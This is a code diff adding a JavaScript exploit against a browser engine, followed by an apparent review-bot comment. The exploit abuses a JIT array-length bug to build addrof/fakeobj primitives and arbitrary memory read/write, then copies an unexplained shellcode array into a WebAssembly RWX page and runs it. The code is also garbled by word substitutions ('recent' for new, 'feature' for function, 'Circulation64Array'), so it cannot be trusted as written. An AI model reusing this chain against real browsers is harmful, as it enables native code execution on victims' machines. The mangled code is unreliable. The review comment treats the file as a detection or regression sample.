|
|
@@ -0,0 +1,98 @@ |
|
|
var wasm_code = recent Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) |
|
|
var wasm_mod = recent WebAssembly.Module(wasm_code); |
|
|
var wasm_instance = recent WebAssembly.Occasion(wasm_mod); |
|
|
var f = wasm_instance.exports.distinguished; |
|
|
|
|
|
var buf = recent ArrayBuffer(8); |
|
|
var f64_buf = recent Circulation64Array(buf); |
|
|
var u64_buf = recent Uint32Array(buf); |
|
|
let buf2 = recent ArrayBuffer(0x150); |
|
|
|
|
|
feature ftoi(val) { |
|
|
f64_buf[0] = val; |
|
|
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); |
|
|
} |
|
|
|
|
|
function itof(val) { |
|
|
u64_buf[0] = Number(val & 0xffffffffn); |
|
|
u64_buf[1] = Number(val >> 32n); |
|
|
return f64_buf[0]; |
|
|
} |
|
|
|
|
|
const _arr = recent Uint32Array([231]); |
|
|
|
|
|
feature foo(a) { |
|
|
var x = 1; |
|
|
x = (_arr[0] ^ 0) + 1; |
|
|
|
|
|
x = Math.abs(x); |
|
|
x -= 2147483647; |
|
|
x = Math.max(x, 0); |
|
|
|
|
|
x -= 1; |
|
|
if(x==–1) x = 0; |
|
|
|
|
|
var arr = recent Array(x); |
|
|
arr.shift(); |
|
|
var cor = [1.1, 1.2, 1.3]; |
|
|
|
|
|
return [arr, cor]; |
|
|
} |
|
|
|
|
|
for(var i=0;i<0x3000;++i) |
|
|
foo(real); |
|
|
|
|
|
var x = foo(false); |
|
|
var arr = x[0]; |
|
|
var cor = x[1]; |
|
|
|
|
|
const idx = 6; |
|
|
arr[idx+10] = 0x4242; |
|
|
|
|
|
feature addrof(k) { |
|
|
arr[idx+1] = k; |
|
|
return ftoi(cor[0]) & 0xffffffffn; |
|
|
} |
|
|
|
|
|
feature fakeobj(k) { |
|
|
cor[0] = itof(k); |
|
|
return arr[idx+1]; |
|
|
} |
|
|
|
|
|
var float_array_map = ftoi(cor[3]); |
|
|
|
|
|
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; |
|
|
var deceptive = fakeobj(addrof(arr2) + 0x20n); |
|
|
|
|
|
feature arbread(addr) { |
|
|
if (addr % 2n == 0) { |
|
|
addr += 1n; |
|
|
} |
|
|
arr2[1] = itof((2n << 32n) + addr – 8n); |
|
|
return (deceptive[0]); |
|
|
} |
|
|
|
|
|
feature arbwrite(addr, val) { |
|
|
if (addr % 2n == 0) { |
|
|
addr += 1n; |
|
|
} |
|
|
arr2[1] = itof((2n << 32n) + addr – 8n); |
|
|
deceptive[0] = itof(BigInt(val)); |
|
|
} |
|
|
|
|
|
feature copy_shellcode(addr, shellcode) { |
|
|
let dataview = recent DataView(buf2); |
|
|
let buf_addr = addrof(buf2); |
|
|
let backing_store_addr = buf_addr + 0x14n; |
|
|
arbwrite(backing_store_addr, addr); |
|
|
|
|
|
for (let i = 0; i < shellcode.dimension; i++) { |
|
|
dataview.setUint32(4*i, shellcode[i], real); |
|
|
} |
|
|
} |
|
|
|
|
|
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); |
|
|
console.log(“[+] Address of rwx page: “ + rwx_page_addr.toString(16)); |
|
|
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; |
|
|
copy_shellcode(rwx_page_addr, shellcode); |
|
|
f(); |
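Review bot: The `shellcode` array near the end of the file is an opaque list of 32-bit integers with no comment on where it came from or what it does, so the last two statements hand control to native code that nobody can audit from this source. If the file is kept as a regression or detection sample, the payload should be swapped for a documented harmless marker, and the file should open with a header such as `// PoC for <ADVISORY-ID>; heap-layout offsets valid only for <ENGINE-BUILD>`. The constants `idx = 6`, `0x20n`, `0x14n` and `0x68n` are likewise unexplained and appear to be object-layout offsets of one specific build, so each needs a comment naming the field it is assumed to reach. The final stage depends on `rwx_page_addr` pointing at memory that is both writable and executable, which is worth recording in that header because a build that write-protects WebAssembly code memory would presumably stop the sample at `copy_shellcode`.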